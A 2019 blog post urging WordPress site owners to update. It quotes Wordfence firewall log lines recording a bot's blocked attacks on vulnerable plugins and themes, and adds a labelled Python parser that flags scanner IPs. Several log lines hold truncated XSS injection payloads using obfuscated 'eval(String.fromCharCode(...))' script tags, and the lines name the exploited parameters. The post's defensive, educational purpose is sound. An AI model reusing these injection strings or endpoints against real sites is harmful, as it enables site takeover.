
Why updating WordPress Matters

by | 14th June 2019 | 0 comments

I often bang on about keeping your WordPress website updated; sometimes I feel like a bit of a stuck record, but emails like the one below serve to remind us why it's so important.

The details below came from an email sent to me by Wordfence, a firewall plugin I tend to install on all the WordPress sites I look after. Each line shows a fully automated attack against a known vulnerability, a hole so to speak, that has already been fixed in a newer version of WordPress or of the plugin or theme concerned. However, if the site being attacked is still running the old version, then any one of these attacks could give the attacker control of the site.

Each line shows the bot attempting a different attack just seconds apart, and it will keep going until either it gets in or it has tried every attack it knows.

June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Total Donations (all known versions) – Multiple Unauthenticated AJAX Actions
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Newspaper Premium Theme <= 6.7.1 – Privilege Escalation
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…

June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61,…
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61,…
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 100, 111,…
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 100, 111,…
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 1…
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 112, 112, 112, 61, 10…
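To show what a log like the one above tells a defender, here is an added Python example (not from the post and not Wordfence's own code) that parses lines in the format quoted above, groups the hits by source IP, and flags an address that trips several different rules within a short window as an automated scanner; the sample lines are copied from the log above with the payloads cut short at the script tag.

```python
import re
from collections import defaultdict
from datetime import datetime

# Lines copied from the Wordfence email quoted above; the XSS payloads are cut at "<script" here.
SAMPLE = """\
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Total Donations (all known versions) – Multiple Unauthenticated AJAX Actions
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Newspaper Premium Theme <= 6.7.1 – Privilege Escalation
June 14, 2019 3:39am  192.241.166.230 (United States)     Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test
June 14, 2019 3:38am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: dropdown_css=</style><script
June 14, 2019 3:50am  192.241.166.230 (United States)     Blocked for XSS: Cross Site Scripting in POST body: wp-piwik=<script
June 14, 2019 3:49am  192.241.166.230 (United States)     Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script
"""

# Line shape: "<date> <time>  <ip> (<country>)  Blocked for <rule>[ in <where>: <name>=<payload>]"
LINE_RE = re.compile(
    r"^(?P<when>\w+ \d{1,2}, \d{4} \d{1,2}:\d{2}[ap]m)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\((?P<country>[^)]*)\)\s+"
    r"Blocked for (?P<rule>.+?)(?: in (?P<where>POST body|query string): (?P<param>[^=]*)=?.*)?$"
)

def parse_line(line):
    """Parse one log line into a dict (with a real datetime); None if it is not a Wordfence block line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()  # only the parameter NAME is kept; the payload after "=" is dropped
    rec["when"] = datetime.strptime(rec["when"], "%B %d, %Y %I:%M%p")
    return rec

def summarise(text, min_rules=3):
    """Group hits per source IP; an IP that trips >= min_rules distinct rules is flagged as a scanner."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, text.splitlines())):
        by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, hits in by_ip.items():
        times = [h["when"] for h in hits]
        rules = sorted({h["rule"] for h in hits})
        report[ip] = {"hits": len(hits), "rules": rules,
                      "span_seconds": int((max(times) - min(times)).total_seconds()),
                      "scanner": len(rules) >= min_rules}
    return report

if __name__ == "__main__":
    for ip, r in summarise(SAMPLE).items():
        print(f"{ip}: {r['hits']} hits, {len(r['rules'])} distinct rules in {r['span_seconds']}s, scanner={r['scanner']}")
```

On the sample this reports one address trying six different known vulnerabilities inside twelve minutes, which is the signature of an automated scanner rather than a person.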

So how do you know which version of WordPress you have? Simple: log into your dashboard and have a look at the At a Glance section. In the screenshot below you can see this site (at the time of writing) is running version 5.2.1. You can always find out what the current version is at https://wordpress.org/news/category/releases/

Once you know which version of WordPress you are running you can see how many known vulnerabilities there are over at the CVE Details database. To give you a rough idea: if your website is 2 years old and hasn’t had WordPress updated, you have at least 43 vulnerabilities, that’s 43 ways your website could be hacked. I say at least because that doesn’t include old versions of plugins and themes.

Simply put, you need to keep your website up to date, and doing so is pretty easy, although if you don’t feel comfortable doing it yourself, you can always get someone like me to do it for you.
